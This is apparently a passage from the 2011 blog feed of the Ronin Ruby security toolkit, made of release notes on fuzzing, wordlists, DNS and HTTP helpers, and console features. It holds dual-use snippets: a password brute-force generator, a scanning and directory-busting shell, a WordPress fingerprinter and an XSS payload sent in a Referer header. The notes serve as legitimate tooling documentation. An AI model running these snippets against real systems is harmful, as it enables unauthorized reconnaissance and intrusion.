&quot;QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==&quot;</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;hello world&quot;</span><span class="o">.</span><span class="n">base64_encode</span><span class="p">(</span><span class="ss">:url</span><span class="p">)</span> <span class="c1"># =&gt; &quot;aGVsbG8gd29ybGQ=&quot;</span> </code></pre></div> <p>These base64 formats are similar to the new methods added to the <a href="http://rubydoc.info/stdlib/base64/1.9.2/frames">Base64</a> module in Ruby 1.9.</p> <h3>ronin/fuzzing</h3> <p>All fuzzing methods were moved into <code>ronin/fuzzing</code> and the <a href="/docs/ronin-support/Ronin/Fuzzing.html">Ronin::Fuzzing</a> namespace. <a href="/docs/ronin-support/Ronin/Fuzzing.html">Ronin::Fuzzing</a> was added which contains fuzzing generator methods, which generate various types of malicious data. These methods can be called directly ...</p> <div class="highlight"><pre><code class="ruby"><span class="no">Fuzzing</span><span class="o">.</span><span class="n">format_strings</span> <span class="p">{</span> <span class="o">|</span><span class="n">fmt</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">fmt</span> <span class="p">}</span> </code></pre></div> <p>... or accessed as Enumerators:</p> <div class="highlight"><pre><code class="ruby"><span class="no">Fuzzing</span><span class="o">[</span><span class="ss">:bad_strings</span><span class="o">]</span> <span class="c1"># =&gt; #&lt;Enumerator: Ronin::Fuzzing:bad_strings&gt;</span> </code></pre></div> <p>The fuzzing generator methods can also be used with <a href="/docs/ronin-support/String.html#fuzz-instance_method">String#fuzz</a>:</p> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;GET /sign_in&quot;</span><span class="o">.</span><span class="n">fuzz</span><span class="p">(</span><span class="ss">:unix_path</span> <span class="o">=&gt;</span> <span class="ss">:bad_paths</span><span class="p">)</span> <span class="p">{</span> <span class="o">|</span><span class="n">str</span><span class="o">|</span> <span class="nb">p</span> <span class="n">str</span> <span class="p">}</span> </code></pre></div> <p><a href="/docs/ronin-support/String.html#mutate-instance_method">String#mutate</a> was also added to <code>ronin/fuzzing</code>, which allows for the incremental mutating of a String, given patterns and substitutions.</p> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;hello old dog&quot;</span><span class="o">.</span><span class="n">mutate</span><span class="p">(</span><span class="s1">&#39;e&#39;</span> <span class="o">=&gt;</span> <span class="o">[</span><span class="s1">&#39;3&#39;</span><span class="o">]</span><span class="p">,</span> <span class="s1">&#39;l&#39;</span> <span class="o">=&gt;</span> <span class="o">[</span><span class="s1">&#39;1&#39;</span><span class="o">]</span><span class="p">,</span> <span class="s1">&#39;o&#39;</span> <span class="o">=&gt;</span> <span class="o">[</span><span class="s1">&#39;0&#39;</span><span class="o">]</span><span class="p">)</span> <span class="p">{</span> <span class="o">|</span><span class="n">str</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">str</span> <span class="p">}</span> </code></pre></div> <h3>New Wordlist class</h3> <p><a href="/docs/ronin-support/Ronin/Wordlist.html">Ronin::Wordlist</a> is a class for building and working with wordlists.</p> <p>Use an existing Wordlist file:</p> <div class="highlight"><pre><code class="ruby"><span class="n">wordlist</span> <span class="o">=</span> <span class="no">Wordlist</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="s1">&#39;passwords.txt&#39;</span><span class="p">)</span> <span class="n">wordlist</span><span class="o">.</span><span class="n">each</span> <span class="p">{</span> <span class="o">|</span><span class="n">word</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">word</span> <span class="p">}</span> </code></pre></div> <p>Expand a Wordlist with mutation rules:</p> <div class="highlight"><pre><code class="ruby"><span class="n">wordlist</span> <span class="o">=</span> <span class="no">Wordlist</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="s1">&#39;passwords.txt&#39;</span><span class="p">,</span> <span class="sr">/e/</span> <span class="o">=&gt;</span> <span class="o">[</span><span class="s1">&#39;E&#39;</span><span class="p">,</span> <span class="s1">&#39;3&#39;</span><span class="o">]</span><span class="p">,</span> <span class="sr">/a/</span> <span class="o">=&gt;</span> <span class="o">[</span><span class="s1">&#39;@&#39;</span><span class="o">]</span><span class="p">)</span> <span class="n">wordlist</span><span class="o">.</span><span class="n">each</span> <span class="p">{</span> <span class="o">|</span><span class="n">word</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">word</span> <span class="p">}</span> </code></pre></div> <p>Build a Wordlist from arbitrary text:</p> <div class="highlight"><pre><code class="ruby"><span class="n">wordlist</span> <span class="o">=</span> <span class="no">Wordlist</span><span class="o">.</span><span class="n">build</span><span class="p">(</span><span class="n">text</span><span class="p">)</span> <span class="n">wordlist</span><span class="o">.</span><span class="n">each_n_words</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> <span class="p">{</span> <span class="o">|</span><span class="n">words</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">words</span> <span class="p">}</span> </code></pre></div> <h3>Network modules</h3> <p>As of <a href="/docs/ronin-support/">ronin-support</a> 0.4.0 all <code>Net</code> convenience methods have been moved into their respective modules in the <a href="/docs/ronin-support/Ronin/Network.html">Network</a> namespace. One can add the Network convenience methods to any Class/Module by simply including a Network module:</p> <div class="highlight"><pre><code class="ruby"><span class="nb">require</span> <span class="s1">&#39;ronin/network/http&#39;</span> <span class="k">class</span> <span class="nc">WordpressFingerprinter</span> <span class="kp">include</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:Network</span><span class="o">::</span><span class="no">HTTP</span> <span class="kp">attr_accessor</span> <span class="ss">:host</span> <span class="no">PATH</span> <span class="o">=</span> <span class="s1">&#39;/wp-includes/js/tinymce/tiny_mce.js&#39;</span> <span class="c1"># @see http://tools.sucuri.net/?page=docs&amp;title=fingerprinting-web-apps</span> <span class="no">VERSIONS</span> <span class="o">=</span> <span class="p">{</span> <span class="s1">&#39;a306a72ce0f250e5f67132dc6bcb2ccb&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;2.0&#39;</span><span class="p">,</span> <span class="s1">&#39;4f04728cb4631a553c4266c14b9846aa&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;2.1&#39;</span><span class="p">,</span> <span class="s1">&#39;25e1e78d5b0c221e98e14c6e8c62084f&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;2.2&#39;</span><span class="p">,</span> <span class="s1">&#39;83c83d0f0a71bd57c320d93e59991c53&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;2.3&#39;</span><span class="p">,</span> <span class="s1">&#39;7293453cf0ff5a9a4cfe8cebd5b5a71a&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;2.5&#39;</span><span class="p">,</span> <span class="s1">&#39;61740709537bd19fb6e03b7e11eb8812&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;2.6&#39;</span><span class="p">,</span> <span class="s1">&#39;e6bbc53a727f3af003af272fd229b0b2&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;2.7&#39;</span><span class="p">,</span> <span class="s1">&#39;e6bbc53a727f3af003af272fd229b0b2&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;2.7.1&#39;</span><span class="p">,</span> <span class="s1">&#39;128e75ed19d49a94a771586bf83265ec&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;2.9.1&#39;</span> <span class="p">}</span> <span class="k">def</span> <span class="nf">version</span> <span class="no">VERSIONS</span><span class="o">[</span><span class="n">http_get_body</span><span class="p">(</span><span class="ss">:host</span> <span class="o">=&gt;</span> <span class="vi">@host</span><span class="p">,</span> <span class="ss">:path</span> <span class="o">=&gt;</span> <span class="no">PATH</span><span class="p">)</span><span class="o">.</span><span class="n">md5</span><span class="o">]</span> <span class="k">end</span> <span class="k">end</span> </code></pre></div> <p>Additionally, all Network modules are included into the <a href="/docs/ronin-support/Ronin/Support.html">Ronin::Support</a> and <a href="/docs/ronin/Ronin.html">Ronin</a> namespaces, so no more having to type "<code>Net.</code>":</p> <pre><code>&gt;&gt; tcp_banner 'smtp.gmail.com', 25 =&gt; "220 mx.google.com ESMTP g3sm14650755pbt.41" </code></pre> <h3>Network::DNS</h3> <p><a href="/docs/ronin-support/Ronin/Network/DNS.html">Network::DNS</a> was added, which provides simple DNS methods for Ronin.</p> <div class="highlight"><pre><code class="ruby"><span class="n">dns_lookup</span> <span class="s1">&#39;google.com&#39;</span> <span class="c1"># =&gt; &quot;74.125.224.65&quot;</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">dns_lookup_all</span> <span class="s1">&#39;google.com&#39;</span> <span class="c1"># =&gt; [&quot;74.125.224.128&quot;, &quot;74.125.224.131&quot;, &quot;74.125.224.130&quot;, &quot;74.125.224.136&quot;, &quot;74.125.224.132&quot;, &quot;74.125.224.129&quot;, &quot;74.125.224.142&quot;, &quot;74.125.224.133&quot;, &quot;74.125.224.137&quot;, &quot;74.125.224.134&quot;, &quot;74.125.224.135&quot;]</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">dns_reverse_lookup</span> <span class="s1">&#39;74.125.224.65&#39;</span> <span class="c1"># =&gt; &quot;nuq04s07-in-f1.1e100.net&quot;</span> </code></pre></div> <h3>New Network Mixins</h3> <p><a href="/docs/ronin-support/Ronin/Network/Mixins/DNS.html">Network::Mixins::DNS</a> and <a href="/docs/ronin-support/Ronin/Network/Mixins/SSL.html">Network::Mixins::SSL</a> were also added.</p> <h2>ronin 1.4.0</h2> <h3>Refactored Ronin::UI::CLI::Command</h3> <p>In <a href="/docs/ronin/">ronin</a> 1.4.0 <a href="/docs/ronin/Ronin/UI/CLI/Command.html">Ronin::UI::CLI::Command</a> (the base-class for all CLI commands) was refactored to no longer use the <a href="https://github.com/wycats/thor#readme">Thor</a> library. Now the Command class uses <a href="http://rubydoc.info/gems/parameters/0.4.0/Parameters/Options">Parameters::Options</a>, which combines the <a href="http://rubydoc.info/gems/parameters/0.4.0/file/README.md">Parameters</a> library with Ruby's builtin <a href="http://rubydoc.info/stdlib/optparse/1.9.2/OptionParser">OptionParser</a> module.</p> <p>What resulted from this refactoring was cleaner option syntax and better <code>--help</code> output. Take for example the [Wordlist] command:</p> <div class="highlight"><pre><code class="ruby"><span class="k">class</span> <span class="nc">Wordlist</span> <span class="o">&lt;</span> <span class="no">Command</span> <span class="n">summary</span> <span class="s1">&#39;Builds and/or mutates Wordlists&#39;</span> <span class="n">option</span> <span class="ss">:input</span><span class="p">,</span> <span class="ss">:type</span> <span class="o">=&gt;</span> <span class="nb">String</span><span class="p">,</span> <span class="ss">:flag</span> <span class="o">=&gt;</span> <span class="s1">&#39;-i&#39;</span><span class="p">,</span> <span class="ss">:usage</span> <span class="o">=&gt;</span> <span class="s1">&#39;FILE&#39;</span><span class="p">,</span> <span class="ss">:description</span> <span class="o">=&gt;</span> <span class="s1">&#39;Input file&#39;</span> <span class="n">option</span> <span class="ss">:output</span><span class="p">,</span> <span class="ss">:type</span> <span class="o">=&gt;</span> <span class="nb">String</span><span class="p">,</span> <span class="ss">:flag</span> <span class="o">=&gt;</span> <span class="s1">&#39;-o&#39;</span><span class="p">,</span> <span class="ss">:usage</span> <span class="o">=&gt;</span> <span class="s1">&#39;PATH&#39;</span><span class="p">,</span> <span class="ss">:description</span> <span class="o">=&gt;</span> <span class="s1">&#39;Output wordlist file&#39;</span> <span class="n">option</span> <span class="ss">:mutations</span><span class="p">,</span> <span class="ss">:type</span> <span class="o">=&gt;</span> <span class="no">Hash</span><span class="o">[</span><span class="nb">String</span> <span class="o">=&gt;</span> <span class="nb">Array</span><span class="o">]</span><span class="p">,</span> <span class="ss">:default</span> <span class="o">=&gt;</span> <span class="p">{},</span> <span class="ss">:flag</span> <span class="o">=&gt;</span> <span class="s1">&#39;-m&#39;</span><span class="p">,</span> <span class="ss">:usage</span> <span class="o">=&gt;</span> <span class="s1">&#39;STRING:SUB&#39;</span><span class="p">,</span> <span class="ss">:descriptions</span> <span class="o">=&gt;</span> <span class="s1">&#39;Mutations rules&#39;</span> <span class="n">argument</span> <span class="ss">:template</span><span class="p">,</span> <span class="ss">:type</span> <span class="o">=&gt;</span> <span class="nb">Array</span><span class="p">,</span> <span class="ss">:description</span> <span class="o">=&gt;</span> <span class="s1">&#39;Options word template&#39;</span> <span class="k">def</span> <span class="nf">execute</span> <span class="c1"># ...</span> <span class="k">end</span> <span class="k">end</span> </code></pre></div> <p>Which produces the following <code>--help</code> output:</p> <pre><code>Usage: ronin wordlist [options] TEMPLATE Options: -v, --[no-]verbose Enable verbose output. -q, --[no-]quiet Disable verbose output. --[no-]silent Silence all output. --[no-]color Enables color output. -i, --input [FILE] Input file. -o, --output [PATH] Output wordlist file. -m, --mutations [STRING:SUB] Default: {} Arguments: TEMPLATE Options word template Builds and/or mutates Wordlists </code></pre> <p>It really is that easy to write your own Ronin commands.</p> <h3>Old commands, new again</h3> <p>The <code>ronin</code> <code>install</code>, <code>update</code> and <code>uninstall</code> commands have been brought back in 1.4.0.</p> <pre><code>$ ronin install https://github.com/user/repo.git </code></pre> <p>The <code>ronin repos</code> command now only lists installed Repositories.</p> <h3>Ronin Console .commands</h3> <p>After playing with <a href="http://nodejs.org/">Node.js</a>, I liked how <code>node</code> console commands were prefixed with a <code>.</code> character (ex: <code>.load</code>). The <code>.command</code> syntax also does not conflict with Ruby's syntax. In 1.4.0 all <code>!command</code>s can also be called as <code>.command</code>s in the Ronin Console:</p> <pre><code>&gt;&gt; .edit myscript.rb =&gt; true &gt;&gt; .ping www.google.com ... </code></pre> <h2>ronin-gen 1.1.0</h2> <h3>Ronin::Gen::Generator refactored</h3> <p>In <a href="/docs/ronin-gen/">ronin-gen</a> 1.1.0, <a href="/docs/ronin-gen/Ronin/Gen/Generator.html">Ronin::Gen::Generator</a> (the base-class of all generators) was also refactored to no longer use the <a href="https://github.com/wycats/thor#readme">Thor</a> library. Instead, all Generators use the <a href="http://rubydoc.info/gems/parameters/0.4.0/file/README.md">Parameters</a> library with Ruby's builtin <a href="http://rubydoc.info/stdlib/fileutils/1.9.2/file/README.rdoc">FileUtils</a> module. This change lowers the barrier for writing custom Ronin Generators.</p> <p>For an example of the new Generator syntax, please see the <a href="/docs/ronin-gen/Ronin/Gen/Generators/Repository.html">Repository</a> generator class.</p> <h3>Improved ronin-gen command</h3> <p>The <code>ronin-gen</code> command now uses <a href="http://rubydoc.info/gems/parameters/0.4.0/Parameters/Options">Parameters::Options</a> to directly parse options for the selected Generator. This also improved the <code>--help</code> output for all Generators:</p> <pre><code>$ ronin-gen repository --help ronin-gen repository PATH [options] --path [PATH] The destination path. --title [TITLE] --uri [URI] --source [SOURCE] --website [WEBSITE] --license [LICENSE] Default: "CC-by" --description [DESCRIPTION] Default: "This is a Ronin Repository" --authors [AUTHORS [...]] Default: [] --[no-]tests --[no-]docs --[no-]svn Create a SVN repository. --[no-]git Create a Git repository. --[no-]hg Create a Hg repository. </code></pre> <h3>Generate SVN, Git, Hg Repositories</h3> <p>The <a href="/docs/ronin-gen/Ronin/Gen/Generators/Repository.html">Repository</a> generator now supports generating SVN, Git and Hg repositories:</p> <pre><code>$ ronin-gen repository myrepo --title "My Repository" --hg </code></pre> Fri Nov 04 00:00:00 -0700 2011 postmodern http://ronin-ruby.gihtub.io/blog/2011/11/04/ronin-internals-webcast.html <p>This Saturday (Nov. 5th) we will be giving a webcast on the internals of <a href="https://github.com/ronin-ruby/ronin-support#readme">ronin-support</a>, <a href="https://github.com/ronin-ruby/ronin#readme">ronin</a>, <a href="https://github.com/ronin-ruby/ronin-exploits#readme">ronin-exploits</a> and <a href="https://github.com/ronin-ruby/ronin-scanners#readme">ronin-scanners</a>. The topics that we will cover are:</p> <ul> <li>Convenience methods in action</li> <li>Using the Ronin Database</li> <li>Ronin Repositories Explained</li> <li>Ronin Exploits and Payloads</li> <li>Ronin WebAttacks (LFI, RFI, SQLi)</li> <li>Ronin PostExploitation API</li> <li>Ronin Scanners</li> </ul> <p>This webcast will take place from 16:00 PDT to 20:00 PDT. All Ronin webcasts are free and requires no registration. Just go to <a href="http://yuuguu.com/share">yuuguu.com/share</a> and join the conference-call at <strong>1-415-363-0849</strong>, using the PIN <strong>272335</strong> for both.</p> <p>This is the first time that we have done a Ronin webcast, and was a spur of the moment decision. We will probably be doing more webcasts in the future, so don't worry if you missed the first one. ;)</p> <p><strong>Update:</strong> The last 3rd of the webcast was <a href="http://vimeo.com/31666052">recorded</a>, although the audio quality is not the best.</p> Sun Oct 16 00:00:00 -0700 2011 postmodern http://ronin-ruby.gihtub.io/blog/2011/10/16/ronin-support-0-3-0-and-ronin-1-3-0-released.html <p>After roughly three months, new versions of <a href="http://rubygems.org/gems/ronin-support">ronin-support</a> and <a href="http://rubygems.org/gems/ronin">ronin</a> have been released!</p> <h2>Upgrade</h2> <pre><code>$ gem update ronin </code></pre> <h2>Easier Text Processing</h2> <p><a href="http://rubydoc.info/gems/ronin-support/0.3.0/File#each_line-class_method">File.each_line</a> and <a href="http://rubydoc.info/gems/ronin-support/0.3.0/File#each_row-class_method">File.each_row</a> were added to help with processing large text-files:</p> <div class="highlight"><pre><code class="ruby"><span class="no">File</span><span class="o">.</span><span class="n">each_line</span><span class="p">(</span><span class="s2">&quot;wordlist.txt&quot;</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">word</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">word</span> <span class="k">end</span> <span class="no">File</span><span class="o">.</span><span class="n">each_row</span><span class="p">(</span><span class="s2">&quot;users_dump.txt&quot;</span><span class="p">,</span> <span class="s1">&#39;,&#39;</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">user</span><span class="p">,</span><span class="n">pass</span><span class="o">|</span> <span class="c1"># ...</span> <span class="k">end</span> </code></pre></div> <h2>Builtin Regexps</h2> <p>Some common and useful <a href="https://github.com/ronin-ruby/ronin-support/blob/v0.3.0/lib/ronin/extensions/regexp.rb#L22-45">Regular Expressions</a> were added to ronin-support:</p> <ul> <li><code>Regexp::MAC</code></li> <li><code>Regexp::IPv4</code>, <code>Regexp::IPv6</code>, <code>Regexp::IP</code></li> <li><code>Regexp::HOST_NAME</code></li> <li><code>Regexp::USER_NAME</code></li> <li><code>Regexp::EMAIL_ADDR</code></li> </ul> <h2>Bruteforcing and Fuzzing</h2> <p><a href="http://rubydoc.info/gems/ronin-support/0.3.0/String#generate-class_method">String.generate</a> was added to assist in enumerating over every possible String, based on a format template. This method is especially useful for bruteforcing passwords or directories. The following code enumerates through every password starting with five alpha characters and ending in one to three numeric characters:</p> <div class="highlight"><pre><code class="ruby"><span class="nb">String</span><span class="o">.</span><span class="n">generate</span><span class="p">(</span><span class="o">[</span><span class="ss">:alpha</span><span class="p">,</span> <span class="mi">5</span><span class="o">]</span><span class="p">,</span> <span class="o">[</span><span class="ss">:numeric</span><span class="p">,</span> <span class="mi">1</span><span class="o">.</span><span class="n">.</span><span class="mi">3</span><span class="o">]</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">password</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">password</span> <span class="k">end</span> </code></pre></div> <p><a href="http://rubydoc.info/gems/ronin-support/0.3.0/String#fuzz-instance_method">String#fuzz</a> was added to assist in fuzzing Strings. This method will find all occurrences of a sub-string or regular expression, and replace each one with one or more substitutions. The following code replaces every occurrence of a number with 1 to 100 <code>9</code> characters:</p> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;[1,2,3]&quot;</span><span class="o">.</span><span class="n">fuzz</span><span class="p">(</span><span class="sr">/\d+/</span> <span class="o">=&gt;</span> <span class="nb">String</span><span class="o">.</span><span class="n">generate</span><span class="p">(</span><span class="o">[</span><span class="s1">&#39;9&#39;</span><span class="p">,</span> <span class="mi">1</span><span class="o">.</span><span class="n">.</span><span class="mi">100</span><span class="o">]</span><span class="p">))</span> <span class="k">do</span> <span class="o">|</span><span class="n">str</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">str</span> <span class="k">end</span> </code></pre></div> <h2>Easier DNS Queries</h2> <p>Sometimes you need to query a specific DNS server, and bypass <code>/etc/hosts</code>. Now you can, using any of the <code>lookup</code> methods:</p> <div class="highlight"><pre><code class="ruby"><span class="n">ip</span> <span class="o">=</span> <span class="no">IPAddr</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="s2">&quot;209.20.85.251&quot;</span><span class="p">)</span> <span class="n">ip</span><span class="o">.</span><span class="n">lookup</span><span class="p">(</span><span class="s2">&quot;4.2.2.1&quot;</span><span class="p">)</span> <span class="c1"># =&gt; [#&lt;Resolv::DNS::Name: 209-20-85-251.slicehost.net.&gt;]</span> </code></pre></div> <h2>URI::HTTP Convenience Methods</h2> <p><code>Net.http_*</code> convenience methods were added to <a href="http://rubydoc.info/gems/ronin-support/0.3.0/URI/HTTP">URI::HTTP</a>, for quicker access:</p> <div class="highlight"><pre><code class="ruby"><span class="n">url</span> <span class="o">=</span> <span class="no">URI</span><span class="p">(</span><span class="s2">&quot;http://www.vannin.com/robots.txt&quot;</span><span class="p">)</span> <span class="n">url</span><span class="o">.</span><span class="n">ok?</span> <span class="c1"># =&gt; true</span> <span class="n">url</span><span class="o">.</span><span class="n">server</span> <span class="c1"># =&gt; &quot;Apache&quot;</span> <span class="n">url</span><span class="o">.</span><span class="n">get</span> <span class="c1"># =&gt; #&lt;Net::HTTPOK 200 OK readbody=true&gt;</span> <span class="n">url</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="ss">:headers</span> <span class="o">=&gt;</span> <span class="p">{</span><span class="ss">:referer</span> <span class="o">=&gt;</span> <span class="s2">&quot;&gt;&lt;script&gt;alert(&#39;XSS&#39;);&lt;/script&gt;&quot;</span><span class="p">})</span> <span class="c1"># =&gt; #&lt;Net::HTTPOK 200 OK readbody=true&gt;</span> </code></pre></div> <h2>Ronin::UI Moves</h2> <p><a href="http://rubydoc.info/gems/ronin-support/0.3.0/Ronin/UI/Output">Ronin::UI::Output</a> was moved out of ronin and down into ronin-support. Now developers can use <code>print_info</code>, <code>print_warning</code> <code>print_error</code> methods from <a href="http://rubygems.org/gems/ronin-support">ronin-support</a>:</p> <div class="highlight"><pre><code class="ruby"><span class="nb">require</span> <span class="s1">&#39;ronin/ui/output&#39;</span> <span class="kp">include</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:UI</span><span class="o">::</span><span class="ss">Output</span><span class="p">:</span><span class="ss">:Helpers</span> <span class="n">print_info</span> <span class="s2">&quot;Hello&quot;</span> <span class="n">print_error</span> <span class="s2">&quot;Danger!&quot;</span> </code></pre></div> <p><a href="http://rubydoc.info/gems/ronin-support/0.3.0/Ronin/UI/Shell">Ronin::UI::Shell</a> was also moved into ronin-support and refactored. Ronin::UI::Shell is now a Class, where commands can be defined as protected methods:</p> <div class="highlight"><pre><code class="ruby"><span class="nb">require</span> <span class="s1">&#39;ronin/ui/shell&#39;</span> <span class="k">class</span> <span class="nc">PwnShell</span> <span class="o">&lt;</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:UI</span><span class="o">::</span><span class="no">Shell</span> <span class="kp">protected</span> <span class="k">def</span> <span class="nf">scan</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="no">IPAddr</span><span class="o">.</span><span class="n">each</span><span class="p">(</span><span class="n">target</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">ip</span><span class="o">|</span> <span class="k">begin</span> <span class="n">print_info</span> <span class="s2">&quot;%s:</span><span class="se">\t</span><span class="s2">%s&quot;</span><span class="p">,</span> <span class="n">ip</span><span class="p">,</span> <span class="no">Net</span><span class="o">.</span><span class="n">http_server</span><span class="p">(</span><span class="ss">:host</span> <span class="o">=&gt;</span> <span class="n">ip</span><span class="p">)</span> <span class="k">rescue</span> <span class="k">end</span> <span class="k">end</span> <span class="k">end</span> <span class="k">def</span> <span class="nf">dirbust</span><span class="p">(</span><span class="n">target</span><span class="p">,</span><span class="o">*</span><span class="n">words</span><span class="p">)</span> <span class="no">Net</span><span class="o">.</span><span class="n">http_session</span><span class="p">(</span><span class="ss">:host</span> <span class="o">=&gt;</span> <span class="n">target</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">http</span><span class="o">|</span> <span class="n">words</span><span class="o">.</span><span class="n">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">word</span><span class="o">|</span> <span class="n">path</span> <span class="o">=</span> <span class="s2">&quot;/</span><span class="si">#{</span><span class="n">word</span><span class="si">}</span><span class="s2">&quot;</span> <span class="k">if</span> <span class="n">http</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">path</span><span class="p">)</span><span class="o">.</span><span class="n">code</span> <span class="o">==</span> <span class="s2">&quot;200&quot;</span> <span class="n">print_info</span> <span class="s2">&quot;Found http://</span><span class="si">#{</span><span class="n">target</span><span class="si">}#{</span><span class="n">path</span><span class="si">}</span><span class="s2"> ...&quot;</span> <span class="k">end</span> <span class="k">end</span> <span class="k">end</span> <span class="k">end</span> <span class="k">end</span> <span class="no">PwnShell</span><span class="o">.</span><span class="n">start</span> </code></pre></div> <pre><code>&gt; help Available commands: dirbust target [words] exit help quit scan target </code></pre> <h2>Extract and Import Methods</h2> <p><code>extract</code> and <code>import</code> methods were added to <a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/MACAddress">MACAddress</a>, <a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/IPAddress">IPAddress</a>, <a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/HostName">HostName</a>, <a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/URL">URL</a> and <a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/EmailAddress">EmailAddress</a>. <code>extract</code> can parse large amounts of text and extract Resources from it:</p> <div class="highlight"><pre><code class="ruby"><span class="no">HostName</span><span class="o">.</span><span class="n">extract</span><span class="p">(</span><span class="n">text</span><span class="p">)</span> <span class="p">{</span> <span class="o">|</span><span class="n">host</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">host</span> <span class="p">}</span> </code></pre></div> <p><code>import</code> reads every line of a file and saves extracted Resources into the Database:</p> <div class="highlight"><pre><code class="ruby"><span class="no">IPAddress</span><span class="o">.</span><span class="n">import</span><span class="p">(</span><span class="s2">&quot;ips.txt&quot;</span><span class="p">)</span> <span class="p">{</span> <span class="o">|</span><span class="n">ip</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">ip</span> <span class="p">}</span> </code></pre></div> <h2>Inline Commands and Tab-Completion</h2> <p>The Ronin Console received some significant improvements in 1.3.0.</p> <p>Inline Commands were added to the Ronin Console, allowing you to quickly execute system commands. Simply prefix the command to run with a <code>!</code>:</p> <pre><code>&gt;&gt; "olleh".reverse # =&gt; "hello" &gt;&gt; !ncat github.com 80 GET / &lt;html&gt; &lt;head&gt;&lt;title&gt;301 Moved Permanently&lt;/title&gt;&lt;/head&gt; &lt;body bgcolor="white"&gt; &lt;center&gt;&lt;h1&gt;301 Moved Permanently&lt;/h1&gt;&lt;/center&gt; &lt;hr&gt;&lt;center&gt;nginx/1.0.4&lt;/center&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <p>New Tab Completion rules were also added, allowing you to tab-complete data in the Database and more:</p> <ul> <li><p><a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/IPAddress">Ronin::IPAddress</a>es:</p> <pre><code>&gt;&gt; "192.168.&lt;TAB&gt;&lt;TAB&gt; 192.168.1.1 192.168.1.52 </code></pre></li> <li><p><a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/HostName">Ronin::HostName</a>s:</p> <pre><code>&gt;&gt; "www.ex&lt;TAB&gt;&lt;TAB&gt; www.example.com www.exploit-db.com </code></pre></li> <li><p><a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/URL">Ronin::URL</a>s:</p> <pre><code>&gt;&gt; "http://www.victim.com/&lt;TAB&gt;&lt;TAB&gt; http://www.victim.com/index.php http://www.victim.com/page.php?id=1 http://www.victim.com/page.php?id=2 http://www.victim.com/page.php?id=3 </code></pre></li> <li><p><a href="http://rubydoc.info/gems/ronin/1.3.0/Ronin/EmailAddress">Ronin::EmailAddress</a>es:</p> <pre><code>&gt;&gt; "alice@e&lt;TAB&gt;&lt;TAB&gt; alice@evil.com alice@example.com </code></pre></li> <li><p>Local files / directories:</p> <pre><code>&gt;&gt; File.read("dump.&lt;TAB&gt;&lt;TAB&gt; dump.txt dump.csv </code></pre></li> <li><p>Inline Commands:</p> <pre><code>&gt;&gt; !nc&lt;TAB&gt;&lt;TAB&gt; !nc !ncat !ncftp </code></pre></li> </ul> Sun Sep 25 00:00:00 -0700 2011 postmodern http://ronin-ruby.gihtub.io/blog/2011/09/25/website-redesigned.html <p>It has been a while since the Ronin website saw major changes. I finally got around to doing a minor redesign, with the goals of maximizing screen real estate and better organization of content. Here are the major changes.</p> <h2>SVGs FTW</h2> <p>The first thing you will notice is the improved <a href="http://cloud.github.com/downloads/ronin-ruby/art/logo.svg">logo</a>. I converted the original PNG logo (created with <a href="http://www.gimp.org/">Gimp</a>!) into a <a href="http://en.wikipedia.org/wiki/Scalable_Vector_Graphics">Scalable Vector 